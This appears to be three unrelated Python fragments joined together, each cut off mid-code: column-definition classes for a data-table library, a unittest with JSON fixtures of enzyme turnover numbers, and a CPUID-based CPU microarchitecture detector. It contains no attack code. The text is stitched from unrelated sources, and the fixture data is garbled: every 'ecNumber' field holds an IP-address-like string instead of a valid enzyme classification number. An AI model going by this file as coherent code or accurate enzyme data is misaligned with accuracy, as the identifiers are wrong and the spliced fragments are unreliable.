class StdDevColumn(Serializable["StdDevColumn"], Column):
"""[ALPHA] Column containing the standard deviation of a real-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="std_dev_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.target_units = target_units
class QuantileColumn(Serializable["QuantileColumn"], Column):
"""[ALPHA] Column containing a quantile of the variable.
The column is populated with the quantile function of the distribution evaluated at "quantile".
For example, for a uniform distribution parameterized by a lower and upper bound, the value
in the column would be:
.. math::
lower + (upper - lower) * quantile
while for a normal distribution parameterized by a mean and stddev, the value would be:
.. math::
mean + stddev * \\sqrt{2} * erf^{-1}(2 * quantile - 1)
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
quantile: float
the quantile to use for the column, defined between 0.0 and 1.0
target_units: Optional[str]
units to convert the real variable into
"""
data_source = properties.String('data_source')
quantile = properties.Float("quantile")
target_units = properties.Optional(properties.String, "target_units")
typ = properties.String('type', default="quantile_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "quantile", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
quantile: float,
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.quantile = quantile
self.target_units = target_units
class OriginalUnitsColumn(Serializable["OriginalUnitsColumn"], Column):
"""[ALPHA] Column containing the units as entered in the source data.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="original_units_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MostLikelyCategoryColumn(Serializable["MostLikelyCategoryColumn"], Column):
"""[ALPHA] Column containing the most likely category.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="most_likely_category_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MostLikelyProbabilityColumn(Serializable["MostLikelyProbabilityColumn"], Column):
"""[ALPHA] Column containing the probability of the most likely category.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="most_likely_probability_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class FlatCompositionColumn(Serializable["FlatCompositionColumn"], Column):
"""[ALPHA] Column that flattens the composition into a string of names and quantities.
The numeric formatting tries to be human readable. For example, if all of the quantities
are round numbers like ``{"spam": 4.0, "eggs": 1.0}`` then the result omit the decimal points
like ``"(spam)4(eggs)1"`` (if sort_order is by quantity).
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
sort_order: CompositionSortOrder
order with which to sort the components when generating the flat string
"""
data_source = properties.String('data_source')
sort_order = properties.Enumeration(CompositionSortOrder, 'sort_order')
typ = properties.String('type', default="flat_composition_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "sort_order", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
sort_order: CompositionSortOrder):
self.data_source = _make_data_source(data_source)
self.sort_order = sort_order
class ComponentQuantityColumn(Serializable["ComponentQuantityColumn"], Column):
"""[ALPHA] Column that extracts the quantity of a given component.
If the component is not present in the composition, then the value in the column will be 0.0.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
component_name: str
name of the component from which to extract the quantity
normalize: bool
whether to normalize the quantity by the sum of all component amounts. Default is false
"""
data_source = properties.String('data_source')
component_name = properties.String("component_name")
normalize = properties.Boolean("normalize")
typ = properties.String('type', default="component_quantity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "component_name", "normalize", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
component_name: str,
normalize: bool = False):
self.data_source = _make_data_source(data_source)
self.component_name = component_name
self.normalize = normalize
class NthBiggestComponentNameColumn(Serializable["NthBiggestComponentNameColumn"], Column):
"""[ALPHA] Name of the Nth biggest component.
If there are fewer than N components in the composition, then this column will be empty.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
n: int
index of the component name to extract, starting with 1 for the biggest
"""
data_source = properties.String('data_source')
n = properties.Integer("n")
typ = properties.String('type', default="biggest_component_name_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "n", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
n: int):
self.data_source = _make_data_source(data_source)
self.n = n
class NthBiggestComponentQuantityColumn(Serializable["NthBiggestComponentQuantityColumn"], Column):
"""[ALPHA] Quantity of the Nth biggest component.
If there are fewer than N components in the composition, then this column will be empty.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
n: int
index of the component quantity to extract, starting with 1 for the biggest
normalize: bool
whether to normalize the quantity by the sum of all component amounts. Default is false
"""
data_source = properties.String('data_source')
n = properties.Integer("n")
normalize = properties.Boolean("normalize")
typ = properties.String('type',
default="biggest_component_quantity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "n", "normalize", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
n: int,
normalize: bool = False):
self.data_source = _make_data_source(data_source)
self.n = n
self.normalize = normalize
class IdentityColumn(Serializable['IdentityColumn'], Column):
"""[ALPHA] Column containing the value of a string-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="identity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MolecularStructureColumn(Serializable['MolecularStructureColumn'], Column):
"""[ALPHA] Column containing a representation of a molecular structure.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
format: ChemicalDisplayFormat
the format in which to display the molecular structure
"""
data_source = properties.String('data_source')
format = properties.Enumeration(ChemicalDisplayFormat, 'format')
typ = properties.String('type', default="molecular_structure_column", deserializable=False)
def | |
<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 19 23:45:56 2018
@author: dimitricoukos
"""
import unittest
import json
import DataTreatment
from DataTreatment import openJson, write
class SampleData(unittest.TestCase):
initial_input = {
"GLNLASEer": {
"N-octanoyl-DL-homoserine lactone": [],
"5-butyl-4-methyldihydro-2(3H)-furanone": [],
"gamma-undecanolactone": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3.92",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.25",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.55",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.63",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.95",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "5.64",
"ecNumber": "172.16.31.10"
}
],
"gamma-dodecanolactone": [],
"N-(3-oxododecanoyl)-L-homoserine lactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "1.01",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "1.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "6.44",
"ecNumber": "172.16.31.10"
}
],
"nonanoic-1,5-lactone": [],
"gamma-dodecalactone": [],
"N-(3-oxodecanoyl)-L-homoserine lactone": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "0.19",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "0.6",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3.96",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.52",
"ecNumber": "172.16.31.10"
}
],
"gamma-dodecanoic lactone": [
{
"organism": "Homo sapiens",
"turnoverNumber": "101",
"ecNumber": "172.16.31.10"
}
],
"gamma-heptalactone": [],
"undecanoic-gamma-lactone": [],
"N-(2-oxotetrahydrofuran-3-yl)pentanamide": [],
"N-octanoylhomoserine lactone": [],
"nonanoic-gamma-lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "2",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "3.1",
"ecNumber": "172.16.31.10"
}
],
"5-(thiobutyl)butyrolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "7.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "19.4",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "116",
"ecNumber": "172.16.31.10"
}
],
"N-hexanoylhomoserine lactone": [],
"N-(3-oxodecanoyl)-DL-homoserine lactone": [],
"delta-undecalactone": [],
"delta-dodecalactone": [],
"gamma-(S)-valerolactone": [],
"gamma-undecalactone": [],
"gamma-(R)-valerolactone": [],
"octanoyl-L-homoserine lactone": [],
"N-(3-oxododecanoyl)-DL-homoserine lactone": [],
"gamma-(S)-caprolactone": [],
"dodecanoic-1,5-lactone": [],
"gamma-nonanoic acid lactone": [],
"gamma-heptanolactone": [],
"Paraoxon": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "8.47",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "12.6",
"ecNumber": "172.16.31.10"
}
],
"dodecanoic-gamma-lactone": [],
"undecanoic-1,5-lactone": [],
"gamma-heptanolide": [
{
"organism": "Sulfolobus acidocaldarius",
"turnoverNumber": "10.25",
"ecNumber": "172.16.31.10"
},
{
"organism": "Homo sapiens",
"turnoverNumber": "34",
"ecNumber": "172.16.31.10"
}
],
"delta-undecanolactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "12.65",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "44.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "56.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "58",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "66.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "71.2",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "93.3",
"ecNumber": "172.16.31.10"
}
],
"gamma-nonalactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "5.54",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "5.57",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "31",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "44.49",
"ecNumber": "172.16.31.10"
}
],
"N-(3-oxohexanoyl)-L-homoserine lactone": [],
"N-(3-oxooctanoyl)-L-homoserine lactone": [],
"3-oxo-octanoyl-L-homoserine lactone": [],
"gamma-dodecanoic acid lactone": [],
"gamma-(R)-caprolactone": [],
"4-methoxy phenyl acetate": [],
"epsilon-caprolactone": [
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "7.27",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus acidocaldarius",
"turnoverNumber": "15.04",
"ecNumber": "172.16.31.10"
}
],
"Gamma-caprolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "25",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "44",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "44",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "112.3",
"ecNumber": "172.16.31.10"
}
],
"gamma-butyrolactone": [
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "5.75",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "111",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "111",
"ecNumber": "172.16.31.10"
}
],
"delta-valerolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.9",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "29.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "40",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "69.4",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "94",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "156",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "632",
"ecNumber": "172.16.31.10"
}
],
"gamma-undecanoiclactone": [],
"9-oxo-N-(2-oxotetrahydrofuran-3-yl)undecanamide": [],
"N-(3-oxooctanoyl)-DL-homoserine lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "0.92",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "0.97",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "4.1",
"ecNumber": "172.16.31.10"
}
],
"N-dodecanoylhomoserine lactone": [],
"nonanoic-delta-lactone": [],
"7-oxo-N-(2-oxotetrahydrofuran-3-yl)nonanamide": [],
"dodecanoic-delta-lactone": [],
"dihydrocoumarin": [
{
"organism": "Homo sapiens",
"turnoverNumber": "152",
"ecNumber": "172.16.31.10"
}
],
"N-dodecanoyl-DL-homoserine lactone": [],
"dodecanoic-1,4-lactone": [],
"gamma-undecanoic acid lactone": [],
"delta-nonalactone": [
{
"organism": "Homo sapiens",
"turnoverNumber": "48",
"ecNumber": "172.16.31.10"
},
{
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "88.91",
"ecNumber": "172.16.31.10"
}
],
"undecanoic-1,4-lactone": [],
"pantoyl lactone": [],
"nonanoic-1,4-lactone": [],
"N-(3-oxohexanoyl)homoserine lactone": [],
"undecanoic-delta-lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "12.9",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "14.1",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "17.65",
"ecNumber": "172.16.31.10"
}
],
"3-oxo-decanoyl-L-homoserine lactone": [],
"N-(3-oxooctanoyl)homoserine lactone": []
},
"CYSTS": {
"L-Ser": [],
"homocysteine": [
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "6.2",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "7.38",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "15.5",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "32.1",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "34",
"ecNumber": "172.16.58.3"
}
],
"L-homocysteine": [
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "0.031",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.04",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.09",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.85",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "3.3",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.66",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "7.93",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "9.06",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "12.7",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "17",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "21.5",
"ecNumber": "172.16.58.3"
}
],
"L-cystathionine": [
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.083",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.133",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.418",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.56",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.56",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "1.03",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "6.08",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "6.08",
"ecNumber": "172.16.58.3"
}
],
"L-cysteine": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "1.95",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "3.13",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "3.13",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.39",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.39",
"ecNumber": "172.16.58.3"
}
],
"L-serine": [
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.082",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.15",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.45",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "0.52",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.85",
"ecNumber": | |
import struct
import cpuid_native
def cpuid(leaf):
_, a, b, c, d = cpuid_native.get_cpuid(leaf)
return (a, b, c, d)
def cpuid_count(leaf, subleaf):
_, a, b, c, d = cpuid_native.get_cpuid_count(leaf, subleaf)
return (a, b, c, d)
def cpu_vendor():
_, b, c, d = cpuid(0)
return struct.pack("III", b, d, c).decode("utf-8")
def cpu_name():
return "".join((struct.pack("IIII", *cpuid(0x80000000 + i)).decode("utf-8")
for i in range(2, 5))).strip()
def xgetbv(ctr):
return cpuid_native.xgetbv(ctr)
def _is_set(id, reg_idx, bit):
regs = cpuid(id)
if (1 << bit) & regs[reg_idx]:
return "Yes"
else:
return "--"
def _is_bmi2(b):
# (feature_string[0 + 8 / 8] & (1 << (8 % 8))) == 0
bit_BMI2 = 0x00000100
return b & bit_BMI2 != 0
def _is_bmi2_cpuid():
_, b, _, _ = cpuid_count(7, 0)
return _is_bmi2(b)
def _is_osxsave(c):
# cpuid_osxsave = (feature_string[11] >> 3) & 1;
bit_OSXSAVE = 0x08000000 # (1 << 27)
return c & bit_OSXSAVE != 0
def _is_osxsave_cpuid():
_, _, c, _ = cpuid(1)
return _is_osxsave(c)
def _is_avx(c):
# cpuid_avx = (feature_string[11] >> 4) & 1;
bit_AVX = 0x10000000 # (1 << 28)
return c & bit_AVX != 0
def _is_avx_cpuid():
_, _, c, _ = cpuid(1)
return _is_avx(c)
def _is_long_mode(d):
# CPUID (feature_string, 0x80000001);
# cpuid_64bit = (feature_string[7] >> 5) & 1;
bit_LM = 0x20000000 # (1 << 29)
return d & bit_LM != 0
def _is_long_mode_cpuid():
_, _, _, d = cpuid(0x80000001)
return _is_long_mode(d)
# https://en.wikichip.org/wiki/intel/cpuid
def _intel(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 5:
if model <= 2:
modelstr = "pentium"
elif model >= 4:
modelstr = "pentiummmx"
elif family == 6:
if model <= 1:
modelstr = "pentiumpro"
elif model <= 6:
modelstr = "pentium2"
elif model <= 8:
modelstr = "pentium3"
elif model <= 9:
modelstr = "pentiumm"
elif model <= 0x0c:
modelstr = "pentium3"
elif model <= 0x0e:
modelstr = "pentiumm"
elif model <= 0x19:
cpu_64bit = 1
modelstr = "core2"
elif model == 0x1a:
cpu_64bit = 1
modelstr = "nehalem" # NHM Gainestown */
elif model == 0x1c:
cpu_64bit = 1
modelstr = "atom" # Silverthorne */
elif model == 0x1d:
cpu_64bit = 1
modelstr = "core2" # PNR Dunnington */
elif model == 0x1e:
cpu_64bit = 1
modelstr = "nehalem" # NHM Lynnfield/Jasper */
elif model == 0x25:
cpu_64bit = 1
modelstr = "westmere" # WSM Clarkdale/Arrandale */
elif model == 0x26:
cpu_64bit = 1
modelstr = "atom" # Lincroft */
elif model == 0x27:
cpu_64bit = 1
modelstr = "atom" # Saltwell */
elif model == 0x2a:
cpu_64bit = 1
cpu_avx=1
modelstr = "sandybridge"# SB */
elif model == 0x2c:
cpu_64bit = 1
modelstr = "westmere" # WSM Gulftown */
elif model == 0x2d:
cpu_64bit = 1
cpu_avx=1
modelstr = "sandybridge"# SBC-EP */
elif model == 0x2e:
cpu_64bit = 1
modelstr = "nehalem" # NHM Beckton */
elif model == 0x2f:
cpu_64bit = 1
modelstr = "westmere" # WSM Eagleton */
elif model == 0x36:
cpu_64bit = 1
modelstr = "atom" # Cedarview/Saltwell */
elif model == 0x37:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x3a:
cpu_64bit = 1
cpu_avx=1
modelstr = "ivybridge" # IBR */
elif model == 0x3c:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell client */
elif model == 0x3d:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell */
elif model == 0x3e:
cpu_64bit = 1
cpu_avx=1
modelstr = "ivybridge" # Ivytown */
elif model == 0x3f:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell server */
elif model == 0x45:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell ULT */
elif model == 0x46:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Crystal Well */
elif model == 0x47:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell */
elif model == 0x4a:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x4c:
cpu_64bit = 1
modelstr = "silvermont" # Airmont */
elif model == 0x4d:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont/Avoton */
elif model == 0x4e:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake" # Skylake client */
elif model == 0x4f:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell server */
elif model == 0x55:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake-avx512" # Skylake server */
elif model == 0x56:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell microserver */
elif model == 0x57:
cpu_64bit = 1
modelstr = "knightslanding" # aka Xeon Phi */
elif model == 0x5a:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x5c:
cpu_64bit = 1
modelstr = "goldmont" # Goldmont */
elif model == 0x5e:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake" # Skylake */
elif model == 0x5f:
cpu_64bit = 1
modelstr = "goldmont" # Goldmont */
elif model == 0x8e:
cpu_64bit = 1
cpu_avx=1
modelstr = "kabylake" # Kabylake Y/U */
elif model == 0x9e:
cpu_64bit = 1
cpu_avx=1
modelstr = "kabylake" # Kabylake desktop */
else:
cpu_64bit = 1
modelstr = "nehalem" # default */
if modelstr == "haswell" or modelstr == "broadwell" or modelstr == "skylake":
# Some haswell, broadwell, skylake lack BMI2. Let them appear as sandybridge for now.
if not _is_bmi2_cpuid() or _workaround_skylake_cpuid_bug():
modelstr = "sandybridge"
elif family == 15:
cpu_64bit = 1
modelstr = "pentium4"
return modelstr, cpu_64bit, cpu_avx
def _amd(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 5:
if model <= 3:
modelstr = "k5"
elif model <= 7:
modelstr = "k6"
elif model == 8:
modelstr = "k62"
elif model == 9:
modelstr = "k63"
elif model == 10:
modelstr = "geode"
elif model == 13:
modelstr = "k63"
elif family == 6:
modelstr = "athlon"
elif family == 15: # K8, K9
cpu_64bit = 1
modelstr = "k8"
elif family == 16: # K10
cpu_64bit = 1
modelstr = "k10"
elif family == 17: # Hybrid k8/k10, claim k8
cpu_64bit = 1
modelstr = "k8"
elif family == 18: # Llano, uses K10 core
cpu_64bit = 1
modelstr = "k10"
elif family == 19: # AMD Internal, assume future K10
cpu_64bit = 1
modelstr = "k10"
elif family == 20: # Bobcat
cpu_64bit = 1
modelstr = "bobcat"
elif family == 21: # Bulldozer
cpu_64bit = 1
cpu_avx = 1
if model <= 1:
modelstr = "bulldozer"
elif model < 0x20: # really 2, [0x10-0x20)
modelstr = "piledriver"
elif model < 0x40: # really [0x30-0x40)
modelstr = "steamroller"
else: # really [0x60-0x70)
modelstr = "excavator"
elif family == 22: # Jaguar, an improved bobcat
cpu_64bit = 1
cpu_avx = 1
modelstr = "jaguar"
return modelstr, cpu_64bit, cpu_avx
def _centaur_hauls(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 6:
if model < 9:
modelstr = "viac3"
elif model < 15:
modelstr = "viac32"
else:
cpu_64bit = 1
modelstr = "nano"
return modelstr, cpu_64bit, cpu_avx
def _workaround_skylake_cpuid_bug():
# Example strings:
# "Intel(R) Pentium(R) CPU G4400 @ 3.30GHz"
# "Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz"
# ^ ^ ^
# 0x80000002 0x80000003 0x80000004
# We match out just the 0x80000003 part here.
# In their infinitive wisdom, Intel decided to use one register order for
# the vendor string, and another for the processor name string. We shuffle
# things about here, rather than write a new variant of our assembly cpuid.
bad_cpus = [" G44", " G45", " G39" ]
processor_name_string = struct.pack("IIII", *cpuid(0x80000003)).decode("utf-8")
for bad in bad_cpus:
if bad in processor_name_string:
return True
return False
def cpu_microarchitecture():
fms, b, c, d = cpuid(1)
family = ((fms >> 8) & 0xf) + ((fms >> 20) & 0xff)
model = ((fms >> 4) & 0xf) + ((fms >> 12) & 0xf0)
vendor_string = cpu_vendor()
if vendor_string == "GenuineIntel":
modelstr, cpu_64bit, cpu_avx = _intel(family, model)
elif vendor_string == "AuthenticAMD":
modelstr, cpu_64bit, cpu_avx = _amd(family, model)
# elif vendor_string == "CyrixInstead":
